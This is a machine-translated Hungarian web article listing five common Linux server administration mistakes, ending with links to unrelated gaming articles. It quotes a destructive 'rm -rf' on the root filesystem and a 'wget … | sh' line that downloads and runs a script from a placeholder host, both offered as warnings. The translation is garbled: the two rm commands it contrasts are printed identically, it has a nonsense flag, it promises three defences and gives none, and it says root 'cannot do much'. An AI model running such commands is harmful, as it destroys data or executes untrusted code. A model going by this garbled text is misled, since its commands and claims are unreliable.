Linux parancsok

Öt Linux Server adminisztrációs hiba és hogyan kerülhető el

Öt Linux Server adminisztrációs hiba és hogyan kerülhető el
2017-ben a GitLab, a verziókezelő tárhely platform alkalmazottját kérték fel a termelési adatok adatbázisának replikálására. Konfigurációs hiba miatt a replikáció nem a várt módon működött, ezért az alkalmazott úgy döntött, hogy eltávolítja az átvitt adatokat, és megpróbálja újra. Parancsot futtatott a nemkívánatos adatok törlésére, csakhogy horrorral rájöjjön, hogy a parancsot belépett egy termelési kiszolgálóhoz kapcsolt SSH munkamenetbe, több száz gigabájt felhasználói adatot törölve. Minden tapasztalt rendszergazda elmondhat hasonló történetet.

A Linux parancssor lehetővé teszi a kiszolgáló rendszergazdák számára a szervereik és a rajtuk tárolt adatok ellenőrzését, de kevéssé állítja le őket pusztító parancsok futtatásában, amelyek következményei nem vonhatók vissza. A véletlenszerű adatok törlése csak egyfajta hiba, amelyet az új szerver-rendszergazdák elkövetnek.

A kulcsok bezárása bent

A kiszolgáló rendszergazdái SSH-hez csatlakoznak a szerverekhez, amely szolgáltatás általában a 22-es porton fut, és bejelentkezési héjat biztosítanak, amelyen keresztül a hitelesített felhasználók távoli szervereken futtathatnak parancsokat. A biztonsági hardver standard lépése az SSH beállítása egy másik porton lévő kapcsolatok elfogadására. Az SSH áthelyezése nagyszámú véletlenszerű portra korlátozza a durva erővel járó támadások hatását; a hackerek nem próbálkozhatnak rosszindulatú bejelentkezésekkel, ha nem találják azt a portot, amelyen az SSH hallgatja.

Azonban egy rendszergazda, aki úgy konfigurálja az SSH-t, hogy egy másik porton hallgassa, majd újraindítsa az SSH-kiszolgálót, azt tapasztalhatja, hogy nem csak a hackerek vannak bezárva. Ha a kiszolgáló tűzfalát sem állítják át úgy, hogy engedélyezze a kapcsolatokat az új porton, akkor a csatlakozási kísérletek soha nem fogják elérni az SSH szervert. Az adminisztrátor bezárul a szerverükről, és nem tudja megoldani a problémát, kivéve, ha támogatási jegyet nyit a tárhelyszolgáltatójánál. Ha megváltoztatja az SSH-portot, mindenképpen nyissa meg az új portot a kiszolgáló tűzfal-konfigurációjában.

Könnyen kitalálható jelszó kiválasztása

A nyers erővel járó támadások találgatások. A támadó sok felhasználónévvel és jelszóval próbálkozik, amíg el nem találja azt a kombinációt, amely beengedi őket. A szótári támadás kifinomultabb megközelítés, amely jelszavak listáját használja, gyakran kiszivárgott jelszó-adatbázisokból. A root fiókkal szembeni támadások könnyebbek, mint más fiókok ellen, mert a támadó már ismeri a felhasználónevet. Ha egy root fióknak egyszerű jelszava van, akkor azt pillanatok alatt feltörheti.

Háromféleképpen lehet védekezni mind a nyers erővel, mind a szótárral szembeni támadások ellen a root fiókkal szemben.

Nem értett parancsok másolása

A Stack Exchange, a Server Fault és a hasonló helyek mentőövek az új Linux rendszeradminisztrátorok számára, de el kell kerülnie a kísértést, hogy másoljon és beillesszen egy nem ismert shell parancsot. Mi a különbség e két parancs között?

sudo rm -rf --no-säilitada-root / mnt / mydrive /
sudo rm -rf --no-säilitada-root / mnt / mydrive /

Könnyen belátható, ha együtt jelennek meg, de nem olyan könnyű, ha fórumokban keresgél, és parancsot keres a csatlakoztatott kötet tartalmának törléséhez. Az első parancs töröl minden fájlt a csatlakoztatott meghajtóról. A második parancs törli ezeket a fájlokat és mindent a szerver gyökér fájlrendszerén. Az egyetlen különbség az utolsó perjel előtti tér.

A kiszolgáló rendszergazdák hosszú parancsokkal találkozhatnak olyan csővezetékekkel, amelyek állítólag egy dolgot csinálnak, de teljesen mást csinálnak. Különösen vigyázzon az internetről kódot letöltő parancsokkal.

wget http: // példa.com / verybadscript -O - | SH -

Ez a parancs a wget használatával letölti a parancsfájlhoz csatolt és végrehajtott parancsfájlt. A biztonságos futtatáshoz meg kell értenie, hogy a parancs mit csinál, és azt is, hogy mit csinál a letöltött szkript, beleértve a letöltött szkript bármelyik kódját.

Bejelentkezés root felhasználóként

Míg a hétköznapi felhasználók csak a saját mappájukban lévő fájlokat módosíthatják, a root felhasználó nem sok mindent képes megtenni egy Linux szerveren. Bármely szoftvert futtathat, adatokat olvashat és fájlokat törölhet.

A root felhasználó által futtatott alkalmazások hasonló erővel bírnak. Kényelmes a root felhasználóként bejelentkezni, mert nem kell állandóan „sudo” vagy „su”, de veszélyes. Az elgépelés másodpercek alatt tönkreteheti a szervert. A root felhasználó által futtatott hibás szoftver katasztrófát idézhet elő. A mindennapi műveletekhez jelentkezzen be rendes felhasználóként, és csak szükség esetén emelje fel a root jogosultságokra.

Nem tanuljuk meg a fájlrendszer engedélyeit

A fájlrendszer engedélyei zavaróak és frusztrálóak lehetnek az új Linux felhasználók számára. A „drwxr-xr-x” típusú jogosultsági karakterlánc eleinte értelmetlenül néz ki, és az engedélyek megakadályozhatják a fájlok módosítását, és a szoftvereket nem tehetik meg, amit akarnak.

A rendszergazdák gyorsan megtudják, hogy a chmod 777 egy varázslatos varázslat, amely megoldja a legtöbb problémát, de ez egy szörnyű ötlet. Ez lehetővé teszi, hogy mindenki, aki rendelkezik fiókkal, olvassa, írja és futtassa a fájlt. Ha a parancsot egy webkiszolgáló könyvtárában futtatja, akkor feltörést kér. A Linux fájlengedélyek bonyolultnak tűnnek, de ha néhány percet vesz igénybe a működésük megismeréséhez, felfedez egy logikus és rugalmas rendszert a fájlhozzáférés ellenőrzésére.

Egy olyan korszakban, amely az egyszerű felhasználói tapasztalatokat értékeli minden más tényezővel szemben, a Linux parancssora továbbra is határozottan összetett és ellenáll az egyszerűsítésnek. Nem keveredhet át, és remélheti, hogy minden rendben lesz. Nem lesz jó, és a végén katasztrófa lesz a kezeden.

De ha megtanulja az alapokat - fájlengedélyeket, parancssori eszközöket és azok opcióit, a legjobb biztonsági gyakorlatokat -, akkor az egyik leghatékonyabb számítógépes platform mesterévé válhat.

A Doom telepítése és lejátszása Linuxon
Bevezetés a Doom-ba A Doom sorozat a 90-es években keletkezett az eredeti Doom megjelenése után. Azonnali sláger volt, és ettől kezdve a játéksorozat ...
Vulkan Linux felhasználók számára
A grafikus kártyák minden új generációjával azt látjuk, hogy a játékfejlesztők átlépik a grafikus hűség határait, és egy lépéssel közelebb kerülnek a ...
OpenTTD vs Simutrans
Saját közlekedési szimuláció létrehozása szórakoztató, pihentető és rendkívül csábító lehet. Ezért meg kell győződnie arról, hogy a lehető legtöbb ját...